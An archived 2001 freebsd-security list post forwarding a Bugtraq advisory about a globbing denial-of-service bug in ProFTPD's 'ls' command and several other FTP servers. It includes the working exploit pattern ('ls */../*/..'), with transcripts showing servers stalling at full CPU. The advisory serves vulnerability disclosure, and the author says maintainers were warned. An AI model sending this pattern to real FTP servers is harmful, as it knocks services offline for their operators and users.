Multiple vendors FTP denial of service (fwd)

From: Attila Nagy (bra@fsn.hu)
Date: 03/15/01


Date: Thu, 15 Mar 2001 21:21:16 +0100 (CET)
From: Attila Nagy <bra@fsn.hu>
To: <freebsd-security@FreeBSD.ORG>


FreeBSD isn't listed, but also vulnerable, at least with the FTPd in
-STABLE.

---------- Forwarded message ----------
Date: Thu, 15 Mar 2001 09:34:09 +0100
From: "Frank DENIS (Jedi/Sector One)" <j@4U.NET>
To: BUGTRAQ@SECURITYFOCUS.COM
Subject: Multiple vendors FTP denial of service

- Proftpd built-in 'ls' command has a globbing bug that allows remote
denial-of-service.

  Here's a simple exploit, tested on the Proftpd site :

$ ftp ftp.proftpd.org
...
Name (ftp.proftpd.org:j): ftp
...
230 Anonymous access granted, restrictions apply.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls */../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*
227 Entering Passive Mode (216,10,40,219,4,111).
421 Service not available, remote server timed out. Connection closed

  That command takes 100% CPU time on the server. It can lead into an easy
DOS even if few remote simultanous connections are allowed.

  Other FTP servers may be concerned as well. Here are various tries :

- NetBSD FTP showed the same behavior than Proftpd :

ftp> ls */../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*
200 EPRT command successful.
(long delay)
421 Service not available, remote server timed out. Connection closed

So NetBSD-ftpd 20000723a may also consume 100% cpu time, resulting in a
possible DOS. Other BSD FTP may be affected as well.

- Microsoft FTP Service (Version 5.0) seems also confused by the command :
ftp> ls */../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*
500 'EPSV': command not understood
227 Entering Passive Mode (207,46,133,140,4,223).
200 PORT command successful.
150 Opening ASCII mode data connection for file list.
(very long delay... nothing happens...)

- Publicfile refuses the command :

ftp> ls */../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*
227 =131,193,178,181,97,222
550 Sorry, I can't open that file: file does not exist.

- Wu-FTPd 2.6.1 is not vulnerable. Only the result of 'ls *' is computed and
displayed.

- PureFTPd (any version) is not vulnerable. Result is "Simplified wildcard
expression to *" and the 'ls *' output.

  Maintainers of vulnerable servers have been warned of this bug.

--
  -=- Frank DENIS aka Jedi/Sector One < spam@jedi.claranet.fr > -=-
		LINAGORA SA (Paris, France) : http://www.linagora.com
To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message


Relevant Pages

  • Re: FTP PUT with Store Unique
    ... years ago but had totally forgotten - I appreciated that the STOU command is ... covers the point I want to make which is that the FTP client commands are ... An SUNIQUE command compatible ...
    (bit.listserv.ibm-main)
  • Re: ftp/fetch "command not understood" on stable and current
    ... and EPSV, but that doesn't tell me anything. ... 220 freebsd.isc.org FTP server ready. ... 500 command not understood ... 227 Entering Passive Mode ...
    (freebsd-stable)
  • Re: FTP PUT with Store Unique
    ... The best list for topics related to the Communications Server IP ... command or vice versa. ... Instructs the FTP client not to include a name with the STOU ... -- If NONAME is in effect, no name string specifying a foreign_file value follows ...
    (bit.listserv.ibm-main)
  • Re: FTP PUT with Store Unique
    ... a date/time stamp into the name before the FTP step. ... I foolishly assumed when I saw the SUnique parameter that - of course! ... command or vice versa. ... -- If NAME is in effect, the name string specifying a foreign_file value ...
    (bit.listserv.ibm-main)
  • Net::FTP vs ProFTPD 1.2.9
    ... and the specific 1.2.9 version of ProFTPD. ... I have tested ProFTPD 1.3.1 ... as does all other FTP servers I have tested. ... but the listcommand takes anywhere from 10-20 ...
    (comp.lang.ruby)